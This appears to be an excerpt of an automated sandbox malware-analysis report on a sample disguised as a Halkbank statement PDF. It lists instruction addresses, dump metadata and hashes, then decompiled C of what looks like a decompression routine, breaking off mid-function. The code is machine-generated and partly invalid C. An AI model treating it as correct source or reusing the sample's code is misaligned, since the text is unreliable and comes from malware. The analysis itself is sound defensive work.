                                                      0x00407546
                                                      0x00407447
                                                      0x00407447
                                                      0x00000000
                                                      0x00000000
                                                      0x0040717d
                                                      0x0040717f
                                                      0x00407186
                                                      0x00407187
                                                      0x00407189
                                                      0x0040718c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407194
                                                      0x00407197
                                                      0x0040719a
                                                      0x0040719c
                                                      0x0040719e
                                                      0x0040719e
                                                      0x0040719f
                                                      0x004071a2
                                                      0x004071a9
                                                      0x004071ac
                                                      0x004071ba
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040749f
                                                      0x0040749f
                                                      0x004074a3
                                                      0x004075db
                                                      0x00000000
                                                      0x004075db
                                                      0x004074a9
                                                      0x004074ac
                                                      0x004074af
                                                      0x004074b3
                                                      0x004074b6
                                                      0x004074bc
                                                      0x004074be
                                                      0x004074be
                                                      0x004074be
                                                      0x004074c1
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x00000000
                                                      0x00000000
                                                      0x004071c2
                                                      0x004071c5
                                                      0x004071fb
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732e
                                                      0x0040732e
                                                      0x00407331
                                                      0x00407333
                                                      0x004075bd
                                                      0x00000000
                                                      0x004075bd
                                                      0x00407339
                                                      0x0040733c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407342
                                                      0x00407346
                                                      0x00407349
                                                      0x00407349
                                                      0x00407349
                                                      0x00000000
                                                      0x00407349
                                                      0x004071c7
                                                      0x004071c9
                                                      0x004071cb
                                                      0x004071cd
                                                      0x004071d0
                                                      0x004071d1
                                                      0x004071d3
                                                      0x004071d5
                                                      0x004071d8
                                                      0x004071db
                                                      0x004071f1
                                                      0x004071f6
                                                      0x0040722e
                                                      0x0040722e
                                                      0x00407232
                                                      0x0040725e
                                                      0x00407260
                                                      0x00407267
                                                      0x0040726a
                                                      0x0040726d
                                                      0x0040726d
                                                      0x00407272
                                                      0x00407272
                                                      0x00407274
                                                      0x00407277
                                                      0x0040727e
                                                      0x00407281
                                                      0x004072ae
                                                      0x004072ae
                                                      0x004072b1
                                                      0x004072b4
                                                      0x00407328
                                                      0x00407328
                                                      0x00407328
                                                      0x00000000
                                                      0x00407328
                                                      0x004072b6
                                                      0x004072bc
                                                      0x004072bf
                                                      0x004072c2
                                                      0x004072c5
                                                      0x004072c8
                                                      0x004072cb
                                                      0x004072ce
                                                      0x004072d1
                                                      0x004072d4
                                                      0x004072d7
                                                      0x004072f0
                                                      0x004072f2
                                                      0x004072f5
                                                      0x004072f6
                                                      0x004072f9
                                                      0x004072fb
                                                      0x004072fe
                                                      0x00407300
                                                      0x00407302
                                                      0x00407305
                                                      0x00407307
                                                      0x0040730a
                                                      0x0040730e
                                                      0x00407310
                                                      0x00407310
                                                      0x00407311
                                                      0x00407314
                                                      0x00407317
                                                      0x004072d9
                                                      0x004072d9
                                                      0x004072e1
                                                      0x004072e6
                                                      0x004072e8
                                                      0x004072eb
                                                      0x004072eb
                                                      0x0040731a
                                                      0x00407321
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x00000000
                                                      0x00407323
                                                      0x00000000
                                                      0x00407323
                                                      0x00407321
                                                      0x00407234
                                                      0x00407237
                                                      0x00407239
                                                      0x0040723c
                                                      0x0040723f
                                                      0x00407242
                                                      0x00407244
                                                      0x00407247
                                                      0x0040724a
                                                      0x0040724a
                                                      0x0040724d
                                                      0x0040724d
                                                      0x00407250
                                                      0x00407257
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x00000000
                                                      0x00407259
                                                      0x00000000
                                                      0x00407259
                                                      0x00407257
                                                      0x004071dd
                                                      0x004071e0
                                                      0x004071e2
                                                      0x004071e5
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f44
                                                      0x00406f44
                                                      0x00406f48
                                                      0x0040758d
                                                      0x00000000
                                                      0x0040758d
                                                      0x00406f4e
                                                      0x00406f51
                                                      0x00406f54
                                                      0x00406f57
                                                      0x00406f5a
                                                      0x00406f5d
                                                      0x00406f60
                                                      0x00406f62
                                                      0x00406f65
                                                      0x00406f68
                                                      0x00406f6b
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00000000
                                                      0x00000000
                                                      0x004070cf
                                                      0x004070cf
                                                      0x004070d3
                                                      0x00407599
                                                      0x00000000
                                                      0x00407599
                                                      0x004070d9
                                                      0x004070dc
                                                      0x004070df
                                                      0x004070e2
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e7
                                                      0x004070ea
                                                      0x004070ed
                                                      0x004070f0
                                                      0x004070f3
                                                      0x004070f6
                                                      0x004070f7
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070fc
                                                      0x004070ff
                                                      0x00407102
                                                      0x00407105
                                                      0x00407105
                                                      0x00407105
                                                      0x00407108
                                                      0x0040710a
                                                      0x0040710a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040734c
                                                      0x0040734c
                                                      0x0040734c
                                                      0x00407350
                                                      0x00000000
                                                      0x00000000
                                                      0x00407356
                                                      0x00407359
                                                      0x0040735c
                                                      0x0040735f
                                                      0x00407361
                                                      0x00407361
                                                      0x00407361
                                                      0x00407364
                                                      0x00407367
                                                      0x0040736a
                                                      0x0040736d
                                                      0x00407370
                                                      0x00407373
                                                      0x00407374
                                                      0x00407376
                                                      0x00407376
                                                      0x00407376
                                                      0x00407379
                                                      0x0040737c
                                                      0x0040737f
                                                      0x00407382
                                                      0x00407385
                                                      0x00407389
                                                      0x0040738b
                                                      0x0040738e
                                                      0x00000000
                                                      0x00407390
                                                      0x0040710d
                                                      0x0040710d
                                                      0x00000000
                                                      0x0040710d
                                                      0x0040738e
                                                      0x004075c3
                                                      0x004075e5
                                                      0x004075eb
                                                      0x004075ed
                                                      0x004075f4
                                                      0x004075f6
                                                      0x004075fd
                                                      0x00407601
                                                      0x00000000
                                                      0x00406bf2
                                                      0x004075fa
                                                      0x004075fa
                                                      0x00000000
                                                      0x004075fa
                                                      0x00407447
                                                      0x004074cd
                                                      0x004074d3
                                                      0x004074d6
                                                      0x004074d9
                                                      0x004074dc
                                                      0x004074df
                                                      0x004074e2
                                                      0x004074e5
                                                      0x004074e8
                                                      0x004074ee
                                                      0x00407507
                                                      0x0040750a
                                                      0x0040750d
                                                      0x00407510
                                                      0x00407514
                                                      0x00407516
                                                      0x00407517
                                                      0x0040751a
                                                      0x004074f0
                                                      0x004074f0
                                                      0x004074f8
                                                      0x004074fd
                                                      0x004074ff
                                                      0x00407502
                                                      0x00407502
                                                      0x00407524
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x00407526
                                                      0x00407524
                                                      0x00000000
                                                      0x00407399

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                      • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                      • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                      • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
